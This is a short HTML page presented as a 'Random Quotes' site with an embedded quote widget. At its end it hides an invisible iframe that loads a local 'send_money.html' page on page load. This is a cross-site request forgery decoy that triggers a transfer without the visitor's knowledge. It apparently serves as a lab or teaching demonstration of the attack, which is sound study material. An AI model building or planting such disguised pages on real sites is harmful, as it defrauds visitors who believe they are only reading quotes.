<!DOCTYPE html>
<html lang="en">

<head>
    <title>Random Quotes</title>
</head>

<h1>Random Quotes by Random People</h1>
<script type="text/javascript" src="https://theysaidso.com/gadgets/v3/theysaidso.js"></script>
<div class="tso_default_style">
   <script>TheySaidSo.render({ quote_id: 'VsevE5h3LUUiZedYPKPwlweF' });</script>
</div>

<br>
<br>

Refresh the page to get another random quote.

<iframe src="http://localhost:8000/send_money.html" style="display: none;"></iframe>

</html>